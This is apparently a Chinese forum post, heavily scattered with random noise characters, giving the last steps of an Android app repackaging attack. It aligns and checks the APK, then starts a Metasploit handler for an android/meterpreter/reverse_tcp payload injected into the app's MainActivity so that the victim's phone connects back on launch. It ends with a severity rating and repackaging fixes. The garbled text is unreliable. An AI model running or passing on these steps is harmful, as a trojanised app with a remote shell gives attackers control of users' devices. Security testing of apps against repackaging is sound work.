+ x6 ?- N6 a6 U# q( E* C8 o 5 V2 c; S# A: O2 X5 I8 {1 \' P keytool -printcert -jarfile repackaged.apk 3 _; r2 \5 B; ?. T, o w0 \: o2 Z) Q# i6 c l G( M/ e! w

F0 X2 k) T+ w& m/ F# ]9 I3 ]; @5 s6 I5 u9 w0 i+ q9 W3 T6 D! v8 g6 u* w 对齐 + q* @2 _4 n' S* T- ~! E* |' N ) m+ s% ~) @; w. m8 ?

$ M. D9 G8 G# C: T. z1 u: q( m8 \5 Y* Y- F1 k& _5 n: p 字节对齐优化 3 C9 i. R" K9 Q6 z( Q7 z 7 z* A# c0 Q4 Z

% g; ~. L5 J. y9 a6 ^# n# p5 q9 O3 Z' [% |& }6 E zipalign -v 4 repackaged.apk final.apk " \8 H0 w, R4 X+ S8 W1 Y8 x/ s f+ Y

& Q U0 @( Y1 C; z. }+ W' i2 w + S; Z0 f) }; [' H" p4 | 检查是否对齐 & d! Y5 `3 I, J) U4 t6 `" _) L. v$ u

% A8 v! j# [+ S) D& g4 }. ] 1 ]3 j8 N( ]. T# w zipalign -c -v 4 final.apk ; v! L w9 s; o( H' W1 t+ c1 [7 ] x( @

6 z% F ~2 z3 C( Y) L9 l3 q 1 `" {2 \( Y% ]4 }) v 注：zipalign可以在V1签名后执行，但zipalign不能在V2签名后执行,只能在V2签名之前执行 & [4 E$ J' h5 e+ } 0 s! Q1 t! ?( j$ A# S% `7 N) W

5 Z: d* S3 K! J$ z& f * E$ c2 d _. V3 l 启动Metasploit控制台，配置参数等待上线 ) f0 u2 @2 c( m6 }( p / @5 |% z5 b Q; n5 f

( U# y! J. M; Y; p X- k5 Y' `: I, R% i9 d# O) w3 c 在终端依次输入如下命令 * p) X/ k6 \2 C# s # a' o2 c- |: k

3 H/ h5 D& ^" Z r# M 2 r0 d( s8 \7 R0 h+ b msfconsole & K5 e4 L x* W: h1 U+ z, m6 g1 k! o+ \! ^! x

! s0 r) R: q3 z ) e7 Q) U% c9 b2 R* c use exploit/multi/handler & k' w+ p/ ^) i" F* v! I1 ^+ {1 X+ {' b+ j8 B$ g) f* r

# R9 h, ^% f! i4 W) K. A5 o* G 0 Z$ m5 ~$ Y9 ]4 }/ F; x% c set PAYLOAD android/meterpreter/reverse_tcp A! d7 U- k" ^ C- n% c! K ! z! T! ^: s' H

E1 |4 ^/ m l: z4 d- r 4 B7 [: O- L, F4 w% f4 u) w set LHOST 192.xxx.xx.xx & y% n) S2 k' Z; _, V2 e4 p& ]4 |3 M8 r8 R

+ S& h0 M" B" d; x# l, ~$ C - N) h- Y% R; t( r @, L; z4 x0 r, q set LPORT 4444 ) z; A8 L2 A2 ^$ k0 Y" H5 I * n/ g0 n2 X$ o

! n3 s0 h% I |: W% N' S# { 8 L: ~8 y% u. E6 v; b# W1 m% {2 m exploit ! C( O7 Y% N" }3 j + g2 W' a: z: B

4 i( e. J/ B- G% W- E: s 5 Y1 O$ n3 d& |- d# J 之前我们把入口放在 MainActivity 的 onCreate 方法中，当启动目标应用进入该界面，就会连接成功，如下图： $ S4 M& [$ P0 S) o p G- m s" ^5 ? 1 B$ b# i/ w' _+ i+ c

- R3 t0 I Q9 V, B3 t0 a+ }: O / m' ^3 {: U' ^8 i7 ^ 漏洞危害：中 0 g1 Z @' u, k$ G7 F8 D, |# X% E0 m0 a

$ H' T" W( Q$ i7 Z% C : E6 n6 T. ]$ a4 o# q+ g P' k: M% @8 X' r 0 k+ w2 T9 X, _ 严重程度 ; b- h0 \|3 s3 \! F J; k& J( [3 S: ~/ D; w+ ^1 y8 o + ]2 y; B, B# m5 W1 `& b" R( U , F5 B$ b* \|8 j5 m a	4 a2 g! ^9 o% F4 C: m6 r 2 {" ^/ x8 F# M6 L6 z ) K) c& A1 J4 e. ` r 8 H3 Y* ]4 G3 ` I9 V4 Y 高 " e' Q# E$ v1 j4 t! x6 C9 t/ N ! [% `: f0 J$ j7 ~5 o0 Z& @ ; G; O5 h; \|5 \|3 o# ^ 0 n0 A% I! b8 O9 g+ O2 e5 n5 w	9 r: v1 ~ V9 \$ s& G" t * G% T _- M$ f( l& { ( Z/ _: m& ~' N: }- Y# @4 P1 ]7 e7 \: @, @1 v ■ 6 V7 ?' b1 H5 m% F , ]5 e* Z+ j9 x+ }1 g4 H& h* T 2 I8 S6 \| S* J9 \8 h . g4 ~8 o: j/ H, D	9 D3 T' U4 M2 h+ L, h8 t! o% V' M. g! v( ?; t6 K( v% _ % v8 a2 @, C5 I/ i$ E" R ' i; r: @; x& Y 中 # Z& v {" E9 f 0 z4 Y, H! P" A 1 h3 s) H5 _/ s8 ]" R& L9 H* ]1 j& \|0 G Q	' V' [2 A- w, {7 R ' }( `& T4 u( y- ^0 n, l - o, }* @$ z; {# w" { 5 K5 \0 r5 z6 z, o# _4 j% ] " Y( P8 ^" K. C* c2 R - Y/ G0 V2 ^* b) C$ Q 6 ^; y& m$ @2 I2 u6 {' }3 [ * ?- d) Z3 j+ l. n % W+ \* D# @% P5 H: q + {6 q( Q b/ Y$ ~	% H3 I. @& O/ e- r+ g' }6 a* K1 ]5 f! h- ~, e9 _' H9 t* e 4 S9 `: O* L7 d* P) r# l" Y $ B4 t5 h* D7 a! ^. ~$ c. G 低 , m! ~+ i$ N) n, U & t) `) ~% d0 o- K q5 V. D 1 t5 L% H3 [4 J1 n" _$ C ( A: R, ~" U( s/ H, d: {	, d$ G& u" w9 [' K' O. w Z ( l- N& T$ t/ m6 s; X: \ % f: j# T5 w; m3 c, v7 ` # \|' @( V, Z- q" M1 X: n4 v; f/ x " ^7 [4 z6 e+ Q7 h- o" f $ q4 o) ]0 d9 r8 @! t6 ~ + m+ R9 N, b9 C X+ q! u! g3 P+ A ( q. c5 f# \3 d( h. F D; \ 2 `$ r) i- [2 I- Z+ Q$ Y 0 A9 L5 H p2 ]* H: U& X; u& s

' x1 `4 C8 L2 E/ \3 g/ ~8 O & H) s+ o7 X" _& @# `" | * E6 X/ N3 J. I- T' ]+ W. M7 x8 N 4 E8 ]" T) J8 u9 j2 ^

6 F9 _8 I! n+ N# \ * m* g# m k7 v% l5 q% x 修复方法： 8 |) X4 ?" v; h- S- g( T 3 @4 @$ U" {: i

9 Y2 }+ ?2 ]- c# N" K# F% u" p ) H! g1 A# g: C3 P' x' O8 D 1.在 APP 启动时应做签名校验防止二次打包。
+ M; p$ v+ } s5 f # p8 Y0 j, e& O: x! Y. O% m% S8 ^' R 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 5 Z0 s) G2 I: V6 M3 I J( ]+ d/ D |5 D9 g0 o( m! [8 q

8 d1 A( Y( R m0 ~. K4 Q # V8 f3 g; J1 I! D 8 t: D& n$ g x$ r1 { 5 n$ ^4 J# e7 i1 z7 w8 z

, c: g2 D; \7 B: ~# | 9 ^5 u- w* T1 {( J- o
5 N3 r2 }; w4 @5 B+ ^; Y" J* E " u" i3 T4 M. Y# N- d

		自动登录	找回密码
密码			立即注册